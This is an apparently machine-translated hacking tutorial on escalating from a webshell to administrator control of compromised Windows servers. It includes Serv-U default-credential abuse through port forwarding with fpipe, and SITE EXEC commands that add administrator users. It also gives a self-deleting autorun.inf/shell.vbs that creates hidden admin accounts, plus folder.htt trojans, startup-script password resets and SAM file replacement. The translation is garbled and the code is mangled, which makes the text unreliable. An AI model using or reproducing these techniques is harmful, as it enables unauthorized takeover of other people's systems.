Online the online leakage, I believe everyone will take a lot of broilers, but they are all Webshell, can not get system authority, how do you get system authority? This is the content we have to discuss this OK, enter my webhell, good, double CPU, speed should be on, don't take you, how can I be willing to enter a password, enter to see, what is good? There is no thing, turn it off, it seems that there is no special thing, see if you can go to other drive characters, point the C disk, not bad, you can go in, this improvement is a SERV-U upgrade OK, look at what procedures in his programe, oh, there are serv-u, remember to see the Serv-U has a default username and password, but the number of listeners is 43958, but it is only local to access, but We have port forwarding tools, not afraid. Let's take a look at his SERV-U version, telnet xxx.xxx.xxx.xxx 21 shows it to 3.0, hey, I have to say that this administrator is really unhappy. Later, I was scanned, and only FTP's hole did not make up. Since this is the case, we start our upgrade authority to upload fpipe, port forwarding tool, Figure three in running the cmd command to enter d: /wwroot/fpipe.exe -v -l 81 -r 43958 127.0.0.1 means The 43598 port of the machine forwards to the 81 port and then opens the serv-u, point serv-u server on our own machine, the server on the menu bar, click the new server, then enter the IP, enter the port, remember the port is just our forwarding 81 port. The service name is just like, how do you do it. Then the username: localadministrator password: #l@ or @ $ 是 字)) OK, then click the server, then you can see existing users, create a new user, Plus all permissions. It is not to lock the root directory. Next is to log in. If you log in to the FTP, you must log in to the CMD. After entering the general command and DOS, ftp> quote Site Exec Net.exe User HK Pass / AddFTP> Quote Site Exec NET If the other party has opened 3389, don't teach you how to do it, no way, newly establish IPC connection, upload Trojan or open 3389 Tool 2 auto.ini plus shell.vbs
Autorun.inf [autorun] open = shell.vbsshell.vbsdim wsh set wsh = creteObject ("wscript.shell") wsh.run "net user guest /act :yes" ,0wsh.run" net user guest 520ls ", 0WSH. Run "Net Localgroup Administrators Guest /Add" Net USER HKBME 520LS /ADD ", 0Wsh.Run" Net localgroup administrators hkbme /add" ,0wsh.run "cmd.exe / c del autorun.inf", 0WSH .Run "cmd.exe / c del shell.vbs", 0 but so that you can access the root directory of the other party. Put these two files into the root of the other's hard drive. Of course, you can also perform Trojans directly, but also a Trojan, but the statement is the same as the last two sentences, perform Trojan three Folder.htt with Desktop.ini through CMD, and Desktop.ini will overwrite the folder.htt with Desktop.ini, and Your Trojan or VBS or what is the most likely browsing of the other party administrator, think it is not enough, you can put more folder.htt Add code
[Drive1:] [Path1] FileName Specifies the source file. [DRIVE2:] [PATH2] Specifies the directory to replace the file. / A Add a new file to the target directory. Can't use with / s or / u command line switch. You will be prompted to confirm before / p before you join the source file. / R Replace the read-only file and unprotected files. / S Replace the file of all subdirectories in the target directory. Can't use with / a command options. / W Waiting for you to run again after inserting the disk. / U will only replace or update files that have previously earlier than source files. You can't use this command with / a command line switch to use this command, see if you can't replace files that cannot be accessed, you can test the five scripts to write a start / shutdown script configuration file Scripts.ini, this file name is Fixed, can not change. The content is as follows:
[Startup] 0cmdline = a.bat0Parameters = Save file Scripts.ini to "C: / Winnt / System32 / GroupPolicy / Machine / Scripts" A.BAT content can be NET USER Yonghu MIMA can also be Net User Administrator XXX this Restore the password you want to have any username, you can also add new users, but to rely on restart, there is a write-to-SAM if you can access the other party's SAM file, etc. After he restarted, the admin user password suddenly had an idea. Can you replace it with the replace command, you can extract your SAM file and upload it to any of his directory, then replace it. But I don't know if I have no permissions to System32, I can replace it.
